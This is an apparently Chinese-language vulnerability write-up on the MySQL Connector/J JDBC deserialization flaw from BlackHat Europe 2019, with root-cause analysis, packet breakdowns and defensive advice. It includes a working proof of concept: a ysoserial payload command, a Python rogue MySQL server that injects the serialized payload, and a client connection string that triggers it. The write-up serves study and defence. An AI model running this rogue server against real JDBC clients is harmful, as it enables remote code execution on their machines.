MySQL JDBC 反序列化漏洞深入分析与复现指南<\/h1>

漏洞概述<\/h2>
MySQL JDBC 反序列化漏洞是BlackHat Europe 2019会议上披露的一个安全漏洞，影响MySQL Connector\/J（JDBC驱动）。该漏洞允许攻击者通过精心构造的恶意MySQL服务器响应，在客户端触发Java反序列化操作，从而导致远程代码执行（RCE）。<\/p>

漏洞原理分析<\/h2>

核心漏洞点<\/h3>

漏洞存在于MySQL JDBC驱动的以下关键组件中：<\/p>

ResultSetImpl.getObject()<\/strong> 方法<\/li>
ServerStatusDiffInterceptor<\/strong> 拦截器<\/li>

autoDeserialize<\/strong> 配置参数<\/li> <\/ol>
漏洞触发链<\/h3>

入口点<\/strong>：当JDBC连接配置了queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor<\/code>时，执行查询会调用拦截器<\/li>
拦截器处理<\/strong>：拦截器会执行SHOW SESSION STATUS<\/code>查询并对结果进行处理<\/li>
结果处理<\/strong>：处理结果时会调用resultSetToMap<\/code>方法，最终调用ResultSetImpl.getObject()<\/code><\/li>
反序列化检查<\/strong>：在getObject()<\/code>方法中，如果autoDeserialize=true<\/code>且数据符合Java序列化格式（前两个字节为0xACED<\/code>），则会进行反序列化操作<\/li> <\/ol> 关键代码分析<\/h3> \/\/ com.mysql.cj.jdbc.result.ResultSetImpl.getObject() <\/span><\/span><\/span><\/span>public<\/span> Object getObject<\/span>(<\/span>int<\/span> columnIndex)<\/span> throws<\/span> SQLException {<\/span> <\/span><\/span> Field field =<\/span> this<\/span>.<\/span>columnDefinition<\/span>.<\/span>getFields<\/span>()[<\/span>columnIndexMinusOne];<\/span> <\/span><\/span> switch<\/span> (<\/span>field.<\/span>getMysqlType<\/span>())<\/span> {<\/span> <\/span><\/span> case<\/span> BIT:<\/span> <\/span><\/span> if<\/span> (<\/span>field.<\/span>isBinary<\/span>()<\/span> ||<\/span> field.<\/span>isBlob<\/span>())<\/span> {<\/span> <\/span><\/span> byte<\/span>[]<\/span> data =<\/span> getBytes(<\/span>columnIndex);<\/span> <\/span><\/span> \/\/ 关键点：检查autoDeserialize配置 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>this<\/span>.<\/span>connection<\/span>.<\/span>getPropertySet<\/span>().<\/span>getBooleanProperty<\/span>(<\/span>PropertyDefinitions.<\/span>PNAME_autoDeserialize<\/span>).<\/span>getValue<\/span>())<\/span> {<\/span> <\/span><\/span> Object obj =<\/span> data;<\/span> <\/span><\/span> if<\/span> ((<\/span>data !=<\/span> null<\/span>)<\/span> &&<\/span> (<\/span>data.<\/span>length<\/span> >=<\/span> 2<\/span>))<\/span> {<\/span> <\/span><\/span> \/\/ 检查Java序列化魔术字(0xACED) <\/span><\/span><\/span><\/span> if<\/span> ((<\/span>data[<\/span>0<\/span>]<\/span> ==<\/span> -<\/span>84<\/span>)<\/span> &&<\/span> (<\/span>data[<\/span>1<\/span>]<\/span> ==<\/span> -<\/span>19<\/span>))<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> ByteArrayInputStream bytesIn =<\/span> new<\/span> ByteArrayInputStream(<\/span>data);<\/span> <\/span><\/span> ObjectInputStream objIn =<\/span> new<\/span> ObjectInputStream(<\/span>bytesIn);<\/span> <\/span><\/span> obj =<\/span> objIn.<\/span>readObject<\/span>();<\/span> \/\/ 反序列化点 <\/span><\/span><\/span><\/span> objIn.<\/span>close<\/span>();<\/span> <\/span><\/span> bytesIn.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> obj;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> data;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 其他类型处理... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>漏洞复现环境<\/h2> 所需工具<\/h3> MySQL Connector\/J 8.0.12<\/li> IntelliJ IDEA 2020.1+（或其他Java IDE）<\/li> Python 3（用于恶意服务器）<\/li> ysoserial（生成反序列化payload）<\/li> Wireshark + Npcap（抓包分析）<\/li> Java开发环境（JDK 8+）<\/li> <\/ul> 环境配置<\/h3> 创建Java测试项目，添加MySQL Connector\/J依赖<\/li> 准备ysoserial工具生成payload<\/li> 配置Python恶意服务器环境<\/li> <\/ol> 漏洞复现步骤<\/h2> 1. 生成反序列化Payload<\/h3> 使用ysoserial生成计算器payload：<\/p> java -jar ysoserial.jar CommonsCollections7 "calc" > payload.bin <\/code><\/pre> 2. 启动恶意MySQL服务器<\/h3> 使用Python编写恶意服务器，关键部分：<\/p> import<\/span> socket <\/span><\/span>import<\/span> binascii <\/span><\/span>import<\/span> os <\/span><\/span> <\/span><\/span># MySQL协议握手包<\/span> <\/span><\/span>greeting_data =<\/span> "4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"<\/span> <\/span><\/span> <\/span><\/span># MySQL OK响应包<\/span> <\/span><\/span>response_ok_data =<\/span> "0700000200000002000000"<\/span> <\/span><\/span> <\/span><\/span>def<\/span> get_payload_content<\/span>(): <\/span><\/span> # 读取ysoserial生成的payload<\/span> <\/span><\/span> with<\/span> open('payload.bin'<\/span>, 'rb'<\/span>) as<\/span> f: <\/span><\/span> return<\/span> binascii.<\/span>b2a_hex(f.<\/span>read()).<\/span>decode('utf-8'<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> handle_session_status_query<\/span>(conn): <\/span><\/span> # 构造恶意响应包<\/span> <\/span><\/span> mysql_data =<\/span> '0100000102'<\/span> <\/span><\/span> mysql_data +=<\/span> '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'<\/span> <\/span><\/span> mysql_data +=<\/span> '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'<\/span> <\/span><\/span> <\/span><\/span> payload_content =<\/span> get_payload_content() <\/span><\/span> payload_length =<\/span> hex(len(payload_content)\/\/<\/span>2<\/span>)[2<\/span>:].<\/span>zfill(4<\/span>) <\/span><\/span> payload_length_hex =<\/span> payload_length[2<\/span>:4<\/span>] +<\/span> payload_length[0<\/span>:2<\/span>] <\/span><\/span> <\/span><\/span> data_len =<\/span> hex(len(payload_content)\/\/<\/span>2<\/span> +<\/span> 4<\/span>)[2<\/span>:].<\/span>zfill(6<\/span>) <\/span><\/span> data_len_hex =<\/span> data_len[4<\/span>:6<\/span>] +<\/span> data_len[2<\/span>:4<\/span>] +<\/span> data_len[0<\/span>:2<\/span>] <\/span><\/span> <\/span><\/span> mysql_data +=<\/span> data_len_hex +<\/span> '04'<\/span> +<\/span> 'fbfc'<\/span> +<\/span> payload_length_hex <\/span><\/span> mysql_data +=<\/span> payload_content <\/span><\/span> mysql_data +=<\/span> '07000005fe000022000100'<\/span> <\/span><\/span> <\/span><\/span> conn.<\/span>send(binascii.<\/span>a2b_hex(mysql_data)) <\/span><\/span><\/code><\/pre>3. 客户端触发代码<\/h3> public<\/span> class<\/span> JdbcClient<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String driver =<\/span> "com.mysql.cj.jdbc.Driver"<\/span>;<\/span> <\/span><\/span> \/\/ 关键配置：queryInterceptors和autoDeserialize <\/span><\/span><\/span><\/span> String DB_URL =<\/span> "jdbc:mysql:\/\/127.0.0.1:3309\/mysql?"<\/span> +<\/span> <\/span><\/span> "characterEncoding=utf8&useSSL=false&"<\/span> +<\/span> <\/span><\/span> "queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&"<\/span> +<\/span> <\/span><\/span> "autoDeserialize=true"<\/span>;<\/span> <\/span><\/span> <\/span><\/span> Class.<\/span>forName<\/span>(<\/span>driver);<\/span> <\/span><\/span> Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>DB_URL);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 完整复现流程<\/h3> 启动Python恶意MySQL服务器（监听3309端口）<\/li> 运行JdbcClient代码<\/li> 观察客户端是否执行了计算器程序（或其他payload）<\/li> <\/ol> MySQL协议关键点分析<\/h2> 结果集响应包结构<\/h3> 恶意服务器需要构造合法的MySQL结果集响应包，关键结构如下：<\/p> 列数量包<\/strong>：<\/p> 长度(3字节) + 序号(1字节) + 列数量(1字节)<\/li> 示例：01 00 00 01 02<\/code>（表示2列）<\/li> <\/ul> <\/li> 列定义包<\/strong>：<\/p> # 列定义示例<\/span> <\/span><\/span>'1a000002036465660001630163016301630c3f00ffff0000fc9000000000'<\/span> <\/span><\/span># 分解：<\/span> <\/span><\/span># 1a0000 - 长度<\/span> <\/span><\/span># 02 - 序号<\/span> <\/span><\/span># 03646566 - "def"<\/span> <\/span><\/span># 00 - schema<\/span> <\/span><\/span># 0163 - table (1字节，"c")<\/span> <\/span><\/span># 0163 - org_table<\/span> <\/span><\/span># 0163 - name<\/span> <\/span><\/span># 0163 - org_name<\/span> <\/span><\/span># 0c - filler<\/span> <\/span><\/span># 3f00 - 字符集(binary)<\/span> <\/span><\/span># ffff0000 - 最大长度<\/span> <\/span><\/span># fc - 列类型(blob)<\/span> <\/span><\/span># 9000 - flags<\/span> <\/span><\/span># 00 - decimals<\/span> <\/span><\/span># 0000 - filler_2<\/span> <\/span><\/span><\/code><\/pre><\/li> 行数据包<\/strong>：<\/p> 包含序列化payload<\/li> 需要正确计算长度和序号<\/li> <\/ul> <\/li> <\/ol> 防御措施<\/h2> 升级MySQL Connector\/J<\/strong>：<\/p> 使用最新版本的MySQL JDBC驱动<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 避免使用autoDeserialize=true<\/code><\/li> 避免使用不受信任的queryInterceptors<\/li> <\/ul> <\/li> 网络防护<\/strong>：<\/p> 限制JDBC连接只能访问受信任的MySQL服务器<\/li> 使用SSL\/TLS加密JDBC连接<\/li> <\/ul> <\/li> 运行时防护<\/strong>：<\/p> 使用Java安全管理器限制反序列化操作<\/li> 使用反序列化过滤器（JEP 290）<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> MySQL JDBC反序列化漏洞是一个典型的"协议+反序列化"组合漏洞，其核心在于：<\/p> MySQL协议允许服务器返回任意二进制数据<\/li> JDBC驱动在特定配置下会反序列化这些数据<\/li> 通过精心构造的响应包可以触发反序列化操作<\/li> <\/ol> 理解该漏洞需要对MySQL协议、JDBC驱动实现和Java反序列化机制有深入认识。防御此类漏洞的关键在于严格控制反序列化操作和网络边界。<\/p>